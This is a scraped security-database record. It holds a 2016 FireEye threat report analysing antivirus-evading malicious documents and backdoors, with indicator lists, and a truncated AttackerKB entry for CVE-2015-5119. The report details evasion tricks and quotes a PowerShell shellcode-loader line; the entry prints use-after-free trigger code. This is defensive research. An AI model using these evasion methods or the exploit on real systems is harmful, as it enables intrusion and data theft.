**UPS backdoor: **Suspected APT3\n 3. **VBA Macro + Metasploit Shellcode Loader:** Suspected Middle Eastern-based APT\n 4. **Hancom Office HWP Exploit:** Possible APT targeting of South Korea.\n\n**Malware without attribution:**\n\n 1. **OccultAgent**: (New) Code hidden in Excel spreadsheet\n 2. **Spy-Net RAT**: Targeting Brazilian victims\n 3. **VBA Macros + PowerShell scripts:** Netcat Backdoor\n 4. **VBA Macros + Python scripts:** Metasploit Shellcode Loader\n 5. **Office Downloader**\n\n##### **Detailed Sample Analysis**\n\nMalware that remains undetected by more than 56 different AV vendors over a long period of time is worth investigating. This section briefly describes the malware and techniques identified in the undetected samples. A full list of indicators can be found in the IOC section at the end.\n\n**1\\. 4b3858c8b35e964a5eb0e291ff69ced6** \\- 201507.xlsx\n\nType: XLSX \nDescription: CVE-2015-5119 (Flash exploit exposed in the Hacking Team leak) \nAttribution: Suspected APT threat group targeting Taiwan \nCurrent detection: 0/53 \nFirst Submission: July 13, 2015 \nLast Submission: January 27, 2016 \nTime undetected in VT: At least 6 months \n\n\nThis Excel document is PKZIP compressed (following the Open XML Format) with the structure shown in Figure 1:\n\n\n\nFigure 1: Structure of XLSX document\n\nWhen the spreadsheet is opened, a dialog prompts the victim to allow unknown embedded content to be played, as shown in Figure 2. In this case, social engineering is needed to convince the victim to execute the malicious Flash object.\n\n\n\nFigure 2: Excel document content and prompt\n\nWhen the victim allows the embedded content to be played, the activeX1.xml file is read to locate the OLE Control to be used (which corresponds to Macromedia Flash Player, as shown in Figure 3) through the ClassID attribute to finally load the Flash Exploit embedded in the activeX1.bin object.\n\n\n\nFigure 3: Content of activeX1.xml file\n\nThe embedded Flash exploit corresponds to CVE-2015-5119, one of several zero-day exploits identified following the Hacking Team leak in July 2015.[2]\n\nA look at the Flash Action Script (AS) reveals code similar to that from the Hacking Team Exploit, such as the class name exp1_fla/MainTimeLine, the function name TryExpl() with the same use-after-free technique, and even the same error message \u201ccan\u2019t cause UaF\u201d as shown in Figure 4.\n\n\n\nFigure 4: Flash exploit code\n\nThe combination of the class name exp1_fla() and classes ShellMac64, ShellWin32 and ShellWin64 built into the exploit (see Figure 5) were not observed in the original Hacking Team version of the exploit, suggesting that the group responsible for this malicious Excel file modified the original exploit code.\n\n\n\nFigure 5: Flash Action Script classes from malicious Excel file\n\nThe exploit drops a variant of the backdoor we call GOODTIMES (also known as Linopid). The backdoor communicates to Taiwan-based IP addresses 220.128.223.75 and 220.134.47.67 on ports 8080 and 443 via HTTP.\n\nWhile this particular GOODTIMES sample has not been attributed to a specific threat group, GOODTIMES has previously been used by suspected APT actors. Based on previously identified targets and the use of Traditional Chinese language and Taiwan-centric themes in spear phishing messages and decoy documents, the group appears to focus on Taiwanese targets.\n\n##### **Potential AV bypassing reason**\n\n1\\. New delivery mechanism: The leaked CVE-2015-5119 Flash exploit has been used by a wide range of threat groups, including other APT groups such as APT3 and APT18[3]. Previous delivery methods entailed luring the victim to click on a malicious link (delivered via a spear phishing message) where the malicious Flash exploit was hosted on a web page. In this case, the suspected APT group responsible for the GOODTIMES backdoor changed the **delivery mechanism** by embedding the exploit as ActiveX object inside the Excel Open XML Format (PKZIP compressed).\n\n2\\. In addition, while an ActiveX object would normally be embedded inside a Compound File Binary Format[4], in this case the uncompressed Flash content is embedded directly in the Excel file, right after the ClassID, as shown at Figure 6.\n\n\n\nFigure 6: Embedded Flash object\n\n\u00b7 The above steps might be enough to avoid proper parsing of the malicious Flash object. This is the first time we have seen a CVE-2015-5119 sample embedded in an Excel document this way.\n\n**2\\. 22da029dd4e018b7c7135a03d0ba9b99**\n\nType: Win32 binary \nDescription: A variant of the UPS backdoor \nAttribution: suspected APT3 \nCurrent detection: 0/57 \nFirst Submission: August 6, 2015 \nLast Submission: February 2, 2016 \nTime undetected in VT: At least 6 months\n\nUPS is a backdoor capable of uploading and downloading files, creating a reverse shell, reconfiguring itself to use different command and control (CnC) servers, and acting as a proxy server. It uses a custom binary protocol to communicate with its CnC server and it encrypts this custom protocol using a TLS TCP connection.\n\nWhile this particular UPS sample has not been attributed, UPS is commonly used by the China-based APT3.\n\n**Potential AV bypassing reason**\n\n1\\. Junk code insertion: Examining this UPS sample, we see a significant amount of \u201cjunk code\u201d potentially designed to mask the malicious nature of the binary, as well as to complicate analysis or reverse engineering efforts.\n\nIn Figure 7 we see the backdoor executing a jump to address 0x4043AB by forcing the \u201cjump if greater than\u201d comparison to be true by moving a large value (0x4A2E88E4) to the ebx register and then comparing it with a hardcoded lower value (0x6A1E839), after which a large number of junk instructions are skipped (red square). This strategy can be seen through several different execution paths.\n\n\n\nFigure 7: Decompiled UPS sample showing junk code\n\n**3\\. aedd5d8446cc12ddfdc426cca3ed8bf0 - **S-old.xlsb****\n\nType: XLSB \nDescription: VBA Macro + Metasploit Shellcode Loader Backdoor \nAttribution: Suspected Middle Eastern-based APT \nCurrent detection: 1/52 \nFirst Submission: September 28, 2015 \nLast Submission: January 28, 2016 \nTime undetected in VT: At least 4 months\n\nThis particular sample, an Excel Binary Workbook file,[5] has only one generic detection on VT, so we believe it is still worth mentioning in this report.\n\nWhen the spreadsheet is opened, the victim is shown a table of Israeli holidays and prompted to enable macros to view the full list, as shown in Figure 8:\n\n\n\nFigure 8: Malicious Excel file showing calendar data\n\nWhen the macro is executed it creates a Windows binary in memory as shown in Figure 9. Note the Chr(77) + Chr(90) builds the MS-DOS header magic number \u201cMZ\u201d.\n\n\n\nFigure 9: Macro concatenating bytes to form a Windows binary\n\nThe binary is written to the file system with the file name NTUSER.dat{**GUID**}.exe as shown in Figure 10.\n\n\n\nFigure 10: Creating the Windows binary\n\nIn this case, the GUID selected corresponds to Scriptlet.TypeLib ActiveX object, creating the file name NTUSER.dat{FB9D87AE-8FEA-4583-98AB-2FB396EAB5FC}.exe (md5 6aab47b18afacbfa7423f09bd1fa6d25) that is later executed via the ShellExecute() API with the SW_HIDE parameter to run silently.\n\nFinally, the executable comes with an embedded Metasploit Shellcode loader that connects to 84.11.146.62 on port TCP 13661.\n\nWhile this sample has not been attributed, similar techniques (use of XLSB files with embedded, obfuscated macros; creation of the file name NTUSER.dat{GUID}.exe; use of the binary to download additional malware) and the same CnC IP address have been referenced in reporting on a suspected Middle Eastern-based APT group known as \u201cRocket Kitten\u201d, primarily targeting Middle Eastern and European organizations.\n\n**_Potential AV bypassing reason_**\n\n1\\. The byte concatenation inside the VBA Macro, used to build a Win32 binary at runtime, helps to bypass signature-based detection.\n\n**4\\. 4e51143b01e99afc3bd908794d81d3cb** \nType: HWP \nDescription: Hancom Office HWP Exploit \nAttribution: None \nCurrent detection: 3/53 \nFirst Submission: July 31, 2015 \nLast Submission: February 2, 2016 \nTime undetected in VT: At least 6 months with 3 generic detections\n\nThis sample, a Hangul Word Processor (HWP) document, has only three generic detections on VT, so we found it to be worth analyzing for this report.\n\nWhen opened, the HWP document displays Korean text and some photographs, as shown in Figure 11. Behind the scenes the document will exploit vulnerable versions of Hancom Office, dropping and executing a malicious file.\n\n\n\nFigure 11: Content of malicious HWP document\n\nInternally, the document structure includes three sections, where section 0 will trigger a Type Confusion vulnerability while parsing the content of the paragraph located at the data record structure HWPTAG_PARA_TEXT starting at offset 0x1C (see uncompressed section 0 at Figure 12). The logic bug will cause the string starting at offset 0x50 to be treated as a control structure. This control structure contains a fake object at offset 0x56 pointing to an address (0x0e0a0e0a) filled by a heap spray that eventually will redirect the execution flow to the shellcode.\n\n\n\nFigure 12: Section0 malformed paragraph\n\nA similar type confusion vulnerability has been previously documented by Ahnlab,[6] however, the vulnerability trigger is different.\n\nSection 2 has an uncompressed size equal to 112MB, used to perform the heap spray and expecting to place the shellcode at a memory address close to 0x0e040e04. In Figure 13, the beginning of the shellcode can be seen (uncompressed).\n\n\n\nFigure 13: Start of shellcode\n\nThe shellcode drops a file on disk and executes it via HncBLXX.HncShellExecute-&gt; SHELL32.ShellExecute. This generates a connection to a compromised Korean automotive website and attempts to retrieve a file with a .JPG extension, which we suspect may be a second-stage binary. However, the file was no longer available on the website at the time of our analysis.\n\nThis particular sample has not been attributed to any threat group. However, the use of malicious HWP documents is notable, as that format is specific to a regional word processing program used heavily in South Korea and in particular by the South Korean government. While the use of malicious HWP files could simply indicate regional targeting by unspecified threat actors, similar exploits have been used in the past by suspected APT groups.\n\n**Potential AV bypassing reason**\n\n1\\. Heap Spray technique change: Similar exploits used to be created with multiple large-size sections in order to spray the heap. This exploit fulfills the same purpose but with only one large-size section.\n\n2\\. Vulnerability triggered in a different format: A similar type confusion vulnerability described in this section was seen implemented in the Open XML Format (HWPX extension)[7], but this time ported to the Compound File Binary Format (HWP extension).\n\n**5\\. 497eddab53c07f4be1dc4a8c169261a5** \\- Barclays_Q22015_IMS_excel_tables.xlsm\n\nType: XLSM \nDescription: **VBA Macro + VBScript generated from spreadsheet** \nAttribution: None \nCurrent detection: 1/54 \nFirst Submission: Julio 08, 2015 \nLast Submission: January 27, 2016 \nTime undetected in VT: At least 7 months\n\nThis sample, an Excel macro-enabled file, has only one generic detection. The embedded macro creates an encoded Visual Basic (VBE) file that connects to a CnC site and allows remote control of the victim\u2019s computer. As we had not previously observed this backdoor, we named it OccultAgent.\n\nWhen the XLSM file is opened, the user is prompted to enable macros, as shown in Figure 14. The instructions are displayed in both English and Greek:\n\n\n\nFigure 14: Prompt to enable macros\n\nThe macro drops an encoded VBScript file named ocagent.vbe (69df0c3bab5e681c2e5eb5951a64776e), obtained from the data in a spreadsheet cell (see Figure 15), to C:\\octemp001\\ and executes it. The script connects to hxxp://0x5E469BFD, which is equivalent to hxxp://94.70.155.253, via the victim\u2019s web browser.\n\n\n\nFigure 15: Obfuscated script embedded in spreadsheet cell\n\nThe first stage Macro source code can be seen in Figure 16.\n\nFigure 16: Embedded VBA macro\n\nThe dropped ocagent.vbe VBScript is essentially a backdoor that connects to the CnC server at 94.70.155.253 to register the victim\u2019s computer and to obtain commands to run on the victim\u2019s machine.\n\n**Potential AV bypassing reason**\n\nThe following steps may be sufficient to bypass AV detection:\n\n1\\. Adding encoded VB script into a spreadsheet cell allows attackers to hide the malicious code.\n\n2\\. Representing the IP address in hexadecimal format may be sufficient to bypass regular expressions trying to match standard 32-bit IP addresses (dotted decimal notation).\n\n**6\\. dc15336e7e4579c9c04c6e4e1f11d3dd - **dedinho no cuzinho.rtf\n\nType: RTF \nDescription: RTF file with embedded executable \nAttribution: None \nCurrent detection: 0/54 \nFirst Submission: October 22, 2015 \nLast Submission: January 15, 2016 \nTime undetected in VT: At least 3 months\n\nIn this attack scenario, the victim receives an RTF document that appears to contain an embedded JPG image. The embedded file is actually an executable that attempts to hide its file extension by using a long sequence of underscore characters (e.g., Copy of foto.jpg&lt;underscores&gt;.exe (see Figure 17).\n\nFigure 17: RTF document with embedded file\n\nThe embedded binary (d409dc7e1ca0c86cb71e090591f16146) is packed with RLPack[8]. It drops a second Borland Delphi binary packed with a customized version of UPX, which will then drop the Spy-Net RAT on the system.\n\nSpy-Net[9] allows an attacker to interact with the victim via a remote shell to upload/download files, interact with the registry, run processes and services, capture images of the desktop, and record from the webcam and microphone. It also contains functionality to extract saved passwords and turn the victim into a proxy server. \n\nA beacon to dennyhacker[.]no-ip.org on TCP port 81 prepended with an ASCII representation of the length of the payload (33) and followed by a pipe and a new line character confirms Spy-Net activity:\n\n00000000 33 33 7c 0a 33|.\n\nThe RAT commands are translated to Portuguese to adapt the attack to Brazilian victims; some command examples are shown below (additional commands are listed in the Appendix):\n\nConfiguracoesdoserver = Server settings \nListarjanelas = List windows \nFinalizarconexao = End connection \nListarchaves = List keys\n\n**Potential AV bypassing reason**\n\n1\\. Packers are commonly used to obfuscate code in order to bypass traditional signature-based detection. The use of multiple files packed with two different packers may be sufficient to bypass detection.\n\n**7\\. b1f43ca11dcf9e60f230b9d6d332c479** \u2013 Book2 - Copy.xls\n\nType: XLSX \nDescription: VBA + Python Shellcode loader \nAttribution: None \nCurrent detection: 0/54 \nFirst Submission: September 20, 2015 \nLast Submission: January 28, 2016 \nTime undetected in VT: At least 6 months\n\nWhen opened, this Excel document appears to be blank but contains the VBA macro shown in Figure 18.\n\n\n\nFigure 18: VBA Macro with OLE Object\n\nThe macro will instantiate an OLE Object and load it via the xlVerbPrimary verb. The embedded OLE object contains two files:\n\n * python27.dll (md5 7e6dd0d7cb29103df4a592e364680075) - a legitimate file\n * file.exe (md5 73f16dbf535042bc40e9c663fe01c720) - a binary created with py2exe[10]\n\nOnce file.exe is executed it launches a copy of the Windows calculator (calc.exe) as a decoy. However, behind the scenes it performs a Metasploit reverse TCP Connect to a CnC server.\n\nThe unpacked version of file.exe is obfuscated python that can be seen in Figure 19.\n\n\n\nFigure 19: Python Shellcode\n\nThe following steps describe the process in greater detail:\n\n * File.exe spawns a copy of calc.exe.\n * Base64-decode and AES-decrypt embedded shellcode.\n * Via Python ctypes, the environment is set to run the shellcode loader in memory.\n * The shellcode loader, which has been encoded with the Metasploit Shikata encoder, [11] is configured to connect to the host 31.168.144.18 on port 443.\n * The malware sleeps for 60 seconds and starts again.\n\n**Potential AV bypassing reason** \n\n\nMultiple tricks to evade detection can be seen here:\n\n 1. The file extension of the document is .xls. However, the file is actually an Open XML Format file (.xlsx). This simple trick may bypass extension-based parsers.\n 2. The Embedded OLE object contains a legitimate binary (python27.dll) and a py2exe executable may appear to be a legitimate file.\n 3. The malicious python script is packed using py2exe.\n 4. The Embedded OLE object is extracted from a hidden Sheet3, so the VBA Macro may not appear malicious.\n 5. The shellcode is Base64 encoded and AES encrypted.\n\n**8\\. 95e89fd65a63e8442dcf06d4e768e8f1 **\\- Doc1.docm\n\nType: DOCM \nDescription: VBA + PowerShell + Netcat as Backdoor \nAttribution: None \nCurrent detection: 0/53 \nFirst Submission: June 19, 2015 \nLast Submission: January 26, 2016 \nTime undetected in VT: At least 7 months\n\nThe word document comes with a simple message shown in Figure 20.\n\n\n\nFigure 20: Message distractor\n\nWhen the VBA macro is executed (see Figure 21), PowerShell code is loaded from the document\u2019s comments (see Figure 22):\n\n\n\nFigure 21: Loading malicious code\n\n\n\nFigure 22: Code embedded in the document comments\n\nThe PowerShell script will act as a backdoor to allow remote access to the compromised machine. The script will download and execute netcat to listen on IP 192.168.52.129 and port 3724. Once a connection is received, a PowerShell shell will be sent (via \u2013e powershell.exe option) to the client (PowerShell Reverse shell) as shown in Figure 23.\n\n\n\nFigure 23: Malicious code content\n\nIt is interesting to note that attackers are moving from traditional command prompt shells (cmd.exe) to PowerShell shells (powershell.exe), which are actually more powerful. For example, PowerShell allows the use of WMI (Windows Management Instrumentation), something not readily accessible via the standard command prompt[12].\n\nThe script references a non-routable (RFC1918) IP address, so we suspect that the script was either a proof of concept or meant to be used during the lateral movement phase in a specific internal environment that uses this IP space.\n\n**Potential AV bypassing reason**\n\n1\\. Use of the .docm extension may evade extension-based parsers.\n\n2\\. Embedding the PowerShell script in the document\u2019s comments and executing it from a VB macro adds another layer of complexity. While this is clearly a suspicious behavior, it is not properly identified by signature-based detection.\n\nWe identified several other examples of malware using VBA Macros with PowerShell to mainly run shellcode loaders that allow attackers to gain remote access to victims\u2019 machines. Another example is shown below; it has two VT detections, but serves as an example of a very common variant seen in the wild.\n\n**9\\. 8de1ebacb72f3b23a8235cc66a6b6f68** \u2013 Polnoe_raspisanie_igr.xlsm\n\nType: XLSM \nDescription: VBA Macro + PowerShell \u2013 Shellcode Loader \nAttribution: None \nCurrent detection: 2/54 \nFirst Submission: October 14, 2015 \nLast Submission: January 28, 2016 \nTime undetected: 3.5 months with two generic detections\n\nWhen the Excel document is opened, a message is displayed in Russian. The user is even provided with a link to a legitimate article describing how to enable macros (see Figure 24).\n\nFigure 24: Excel file with legitimate link\n\nWhen the VBA Macro runs, it executes a PowerShell script that Base64-decodes and decompresses a second-stage PowerShell Script that will be used as the shellcode loader in memory (see Figure 25).\n\nFigure 25: PowerShell script being built on the fly via VB script\n\nPowerShell uses the Invoke-Expression (or IEX) call to execute the decompressed string, similar to the eval() functionality from other programming languages.\n\nThe Shellcode in this case comes hardcoded in the second stage PowerShell script, loaded and executed from memory with the following syntax:\n\n$z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000\n\nWhere $x contains the Shellcode loaded in memory that eventually will connect to the domain spl[.]noip[.]me. Based on DNSDB query, the domain **spl[.]noip[.]me **previously resolved to Russian IP 81.23.177.72.\n\nMost of the VBA Macro + PowerShell scripts we identified were created with the macro_safe.py[13] and unicorn.py[14] scripts, often used for penetration testing.\n\n**Potential AV bypassing reason**\n\n1\\. The .xlsm extension may bypass extension-based parsers\n\n2\\. Using the VBA Macro in the first stage to build the first PowerShell script via concatenation provides an easy way to bypass signature-based detection\n\n3\\. The PowerShell scripts are Base64 encoded and compressed\n\n**10\\. cda305a6a6c6ace02597881b01a116e3 - **CVE-2013-1331-doc.docx\n\nType: DOCX \nDescription: Office Downloader \nAttribution: None \nCurrent detection: 0/55 \nFirst Submission: January 12, 2015 \nLast Submission: January 16, 2016 \nTime undetected in VT: The whole year and counting!\n\nIn 2013, a stack-based buffer overflow triggered while parsing PNG images was exploited in the wild against MS Office 2003 and Office for Mac. CVE-2013-1331 was assigned to the vulnerability.\n\nThe malicious samples did not include the PNG directly embedded in the document; rather, the PNG file was loaded from the Internet by using the INCLUDEPICTURE option[15].\n\nThis new sample uses a different option from the new XML Format called \u201cRelationships\u201d in order to download a resource from the Internet, as seen at Figure 26.\n\n\n\nFigure 26: XML content loading the PNG image remotely\n\nThe same domain was used back in 2013, but now with a different download technique. Although the vulnerability has been patched by Microsoft, the aforementioned technique can be used to download any resource from the Internet.\n\n**Potential AV bypassing reason**\n\n1\\. Use of the XML \u2018Relationship\u2019 instead of the original INCLUDEPICTURE method to download resources from the Internet is a novel technique that may not be recognized.\n\n2\\. Based on the code shown above, it is clear that the intention is not to download a .gif image but a .php resource. Signature-based engines should easily detect the unusual resource name with multiple dots.\n\n##### **Conclusion**\n\nThreat actors of all types continue to improve their techniques to compromise organizations and remain undetected within an environment. Our study identified a number of techniques that successfully bypassed many AV engines:\n\n1\\. Alternate techniques to embed objects within Office documents that may not be recognized by AV engines.\n\n2\\. The use of a multi-stage infection approach in order to look unsuspicious at each stage:\n\na. A document downloading an image from the Internet that cannot be flagged as malicious at that stage \nb. A VBA Macro script loading malicious content from spreadsheet cells\n\n3\\. Multiple techniques to load malicious content from Office documents:\n\na. Embedded as ActiveX \nb. Embedded as OLE Binary \nc. Embedded in the document\u2019s comments \nd. Embedded in the spreadsheet cell\n\n4\\. Standalone packed binaries containing malicious Python scripts.\n\n5\\. Multi-layer Packing: RLPack + Custom UPX.\n\n6\\. The combination of multiple scripting languages to allow the attackers to obfuscate malicious code, such as VBA Script building malicious PowerShell scripts.\n\nIn several cases we note that the attackers are reusing known exploits (such as CVE-2015-5119 or CVE-2013-1331), but changing the delivery method; or leveraging obfuscation, encoding, encryption, or multiple layers of packing to disguise their malicious scripts or backdoors.\n\nFor proper detection, it is essential to monitor an attack through its entire life cycle \u2013 not simply when a suspicious document or file first enters a network. This approach is necessary to detect and block multi-stage infection strategies. While initial events (such as the delivery of a macro-enabled spreadsheet) may appear innocuous, eventually a later stage of the attack will trigger detection.\n\nIt is much easier to stop an attack \u2013 including a multi-stage attack \u2013 when it first occurs, to include detecting known and unknown exploits (zero days), or even threats that require user interaction such as macros inside documents.\n\nThis detection approach is the core logic behind FireEye Multi-Vector Virtual Execution (MVX) technology.\n\n##### **APPENDIX**\n\n**Indicators of Compromise - IOCs**\n\n**Network Based:**\n\n**4b3858c8b35e964a5eb0e291ff69ced6**\n\nPOST /0000/a242550.asp \nIP: 220.128.223.75 \nTCP Port: 8080 \n\n**4e51143b01e99afc3bd908794d81d3cb**\n\nGET /bbs/file/machinery/machine_body.jpg \nIP: cncauto.co.kr \nPORT: 80\n\n**8de1ebacb72f3b23a8235cc66a6b6f68**\n\nIP: spl.noip.me \nTCP Port: 80\n\n**b1f43ca11dcf9e60f230b9d6d332c479**\n\nIP: 31.168.144.18 \nTCP Port: 443\n\n**aedd5d8446cc12ddfdc426cca3ed8bf0**\n\nIP: 84.11.146.62 \nTCP Port: 13661\n\n**497eddab53c07f4be1dc4a8c169261a5**\n\nGET /ocagnt/gethooks.asp \nIP: 94.70.155.253 \nTCP Port: 80 \nGET /ocagnt/enckeys \nIP: 94.70.155.253 \nTCP Port: 80 \nGET /ocagnt/getstatus.asp \nIP: 94.70.155.253 \nTCP Port: 80\n\n**dc15336e7e4579c9c04c6e4e1f11d3dd**\n\nIP: dennyhacker.no-ip.org \nTCP Port: 81\n\n**Host-Based:**\n\ndc15336e7e4579c9c04c6e4e1f11d3dd\n\nC:\\Windows\\System32\\install\\server.exe (copy of dropped binary) d409dc7e1ca0c86cb71e090591f16146\n\n%AppData%\\Local\\Temp\\XX--XX--XX.txt\n\nMutex created: \n_x_X_PASSWORDLIST_X_x_ \nx_X_BLOCKMOUSE_X_x_ \n***MUTEX*** \n***MUTEX***_PERSIST\n\n**497eddab53c07f4be1dc4a8c169261a5**\n\nc:\\octemp001\\ \nC:\\octemp001\\enccmdresults.txt \nC:\\octemp001\\ikeycharvalue.txt \nC:\\octemp001\\enchostnameres.txt \nC:\\octemp001\\certutil.txt \nC:\\octemp001\\cert.txt \nC:\\octemp001\\commands.txt \nC:\\octemp001\\prevcommands.txt \nC:\\octemp001\\enccmdresults.txt \nC:\\octemp001\\enccmdresults2.txt \nc:\\octemp001\\key.txt\n\nFigure 27 shows the MD5s with zero detection detailed on this report.\n\n\n\nFigure 27: 2015 samples from VT with zero detections in 2016\n\nSome exceptions to this study were added for samples with low detection rates, but with only generic detection (that is, not detected as part of any specific code family), that used an interesting technique or that were suspected of being used by an APT group (see Figure 28).\n\n\n\nFigure 28: Samples with low and / or generic detection\n\n**dc15336e7e4579c9c04c6e4e1f11d3dd** \u2013 Brazilian RAT\n\nSome interesting commands from the RAT in Portuguese language:\n\n0002A3A8: pingtest \n \n--- \n \n0002A3BC: tentarnovamente \n \n0002A3E0: mouseposition \n \n0002A3F8: keyboardkey \n \n0002A40C: webcaminactive \n \n0002A424: webcamgetbuffer \n \n0002A43C: webcam \n \n0002A44C: desktop \n \n0002A45C: stopsearch \n \n0002A470: listarvalores \n \n0002A488: maininfo \n \n0002A49C: configuracoesdoserver \n \n0002A4BC: disconnect \n \n0002A4D0: uninstall \n \n0002A4E4: renameservidor \n \n0002A4FC: enviarexecnormal \n \n0002A518: enviarexechidden \n \n0002A534: executarcomandos \n \n0002A550: openweb \n \n0002A560: downexec \n \n0002A574: resumetransfer \n \n0002A58C: listardrives \n \n0002A5A4: listararquivos \n \n0002A5BC: execnormal \n \n0002A5D0: execinv \n \n0002A5E0: deletardir \n \n[1] Hangul Word Processor is a word processing application developed by South Korean software firm Hancom. \n[2] http://www.securityweek.com/zero-day-exploits-leaked-hacking-team-breach \n[3] https://www.fireeye.com/blog/threat-research/2015/07/demonstrating_hustle.html \n[4] https://msdn.microsoft.com/en-us/library/dd942138.aspx \n[5] An XLSB file is stored in binary format instead of the normal XML format, allowing the file to be read from and written to much faster. See https://technet.microsoft.com/en-us/library/dd797428.aspx \n[6] http://asec.ahnlab.com/1035 \n[7] https://www.fireeye.com/content/dam/fireeye-www/global/en/blog/threat-research/FireEye_HWP_ZeroDay.pdf \n[8] http://www.pcworld.com/product/997528/rlpack-basic-edition.html \n[9] https://www.fireeye.com/blog/threat-research/2014/07/the-little-signature-that-could-the-curious-case-of-cz-solution.html \n[10] Py2Exe is a distutils extension to create standalone windows programs from python scripts. See https://sourceforge.net/projects/py2exe/. \n[11] https://github.com/rapid7/metasploit-framework/blob/master/modules/encoders/x86/shikata_ga_nai.rb \n[12] http://www.howtogeek.com/163127/how-powershell-differs-from-the-windows-command-prompt/ \n[13] https://github.com/khr0x40sh/MacroShop/blob/master/macro_safe.py \n[14] https://raw.githubusercontent.com/trustedsec/unicorn/master/unicorn.py \n[15] http://blogs.technet.com/b/srd/archive/2013/06/11/ms13-051-get-out-of-my-office.aspx\n", "edition": 2, "cvss3": {}, "published": "2016-04-13T09:00:00", "type": "fireeye", "title": "Ghosts in the Endpoint", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1331", "CVE-2015-5119"], "modified": "2016-04-13T09:00:00", "id": "FIREEYE:C106464BCA41AB0D5AF6965D9907C8C3", "href": "https://www.fireeye.com/blog/threat-research/2016/04/ghosts_in_the_endpoi.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "attackerkb": [{"lastseen": "2021-07-27T21:13:31", "description": "Use-after-free vulnerability in the ByteArray class in the ActionScript 3 (AS3) implementation in Adobe Flash Player 13.x through 13.0.0.296 and 14.x through 18.0.0.194 on Windows and OS X and 11.x through 11.2.202.468 on Linux allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted Flash content that overrides a valueOf function, as exploited in the wild in July 2015.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 23, 2020 6:06pm UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {}, "published": "2021-07-27T00:00:00", "type": "attackerkb", "title": "CVE-2015-5119", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5119"], "modified": "2021-07-27T00:00:00", "id": "AKB:47269E9B-0CEB-46D4-BD88-640970C28E72", "href": "https://attackerkb.com/topics/eDqrGGkKhD/cve-2015-5119", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-20T20:19:02", "description": "Use-after-free vulnerability in the ByteArray class in the ActionScript 3 (AS3) implementation in Adobe Flash Player 13.x through 13.0.0.296 and 14.x through 18.0.0.194 on Windows and OS X and 11.x through 11.2.202.468 on Linux allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted Flash content that overrides a valueOf function, as exploited in the wild in July 2015.\n\n \n**Recent assessments:** \n \n**wchen-r7** at September 12, 2019 6:07pm UTC reported:\n\n<http://en.wikipedia.org/wiki/Adobe_Flash_Player>\n\nCongrats! You are reading about the most beautiful Flash bug for the last four \nyears since CVE-2010-2161.\n\nThe use-after-free vulnerability exists inside the built-in ByteArray class \n<http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/utils/ByteArray.html>\n\nLet\u2019s create a simple ByteArray object:\n \n \n var ba:ByteArray = new ByteArray();\n ba.length = 8;\n ba[1] = 1;\n \n\nNow we can access ba[] items and write numeric byte values into ba[]. \nAlso we are allowed to write objects into ByteArray. For example:\n \n \n var obj = new MyClass();\n ba[0] = obj;\n \n\nAS3 will try to implicitly convert the MyClass object into numeric value by \ncalling the MyClass.valueOf() method. This method can be easily redefined \nwithin the user\u2019s code:\n \n \n class MyClass\n {\n prototype.valueOf = function()\n {\n ba.length = 88; // reallocate ba[] storage\n return 0; // return byte for ba[offset]\n }\n }\n \n\nLet\u2019s see how that implicit conversion occurs inside the native code:\n \n \n push esi\n mov eax, [esp+8] // the offset value from \"ba[offset] = obj\"\n push eax\n add ecx, 0x18 // ecx = this = \"ba\" object pointer\n call ByteArray.getStorage() // gets ba[offset] storage pointer and\n mov esi, eax // saves it in esi\n \n mov ecx, [esp+0xC] // \"obj\" pointer\n push ecx\n call AvmCore.toInteger() // call MyClass.valueOf()\n add esp,4\n mov [esi], al // writes returned byte into array\n \n pop esi\n ret 8\n \n\nOn high-level language this will look like:\n \n \n void ByteArray.setObjInternal(int offset, obj)\n {\n byte* dest = this.getStorage(offset);\n dest* = toInteger(obj);\n }\n \n\nSo the array storage pointer is saved in local variable, then AS3 valueOf() is \ninvoked from the native code and returned byte is written into destination \npointer at the end. If valueOf() changes the length of byte array (see above) \nand reallocates its internal storage, then local destination pointer becomes \nobsolete and further usage of that pointer can lead to UaF memory corruption.\n\nUsing this vulnerability, it\u2019s very easy to control what byte will be written \nand at which offset this corruption will occur.\n\n 1. AFFECTED SOFTWARE \nAdobe Flash Player 9 and higher\n\n 2. TESTING \nOpen the test \u201ccalc.htm\u201d file in your browser and press the button.\n\non Windows: \nCalc.exe should be popped on desktop IE. \nCalc.exe should be run as a non-GUI child process in metro IE. \nPayload returns 0 from CreateProcessA(\u201ccalc.exe\u201d) inside Chrome/FF sandbox.\n\non OS X: \nCalculator is launched in FF or standalone Flash Player projector. \nPayload returns 1 from 